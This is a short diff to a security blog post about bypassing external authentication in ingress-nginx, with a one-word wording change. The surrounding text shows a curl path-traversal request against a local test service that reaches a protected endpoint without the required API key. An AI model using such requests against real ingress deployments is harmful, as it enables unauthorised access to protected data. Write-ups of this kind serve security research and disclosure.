xvnpw/xvnpw.github.io/content/posts/external_authentication_bypass_in_ingress_nginx.md

 {"data":"protected data"}
 ```

-as you can see I needed to provide "secret-api-key" to get resource.
+as you can see I need to provide "secret-api-key" to get resource.

 ## Exploitation

 Let's send request with path traversal

 ```
 $ curl --path-as-is http://127.0.0.1:8080/public-service/../protected-service/protected -H "Host: app.test"
 {"data":"protected data"}
 ```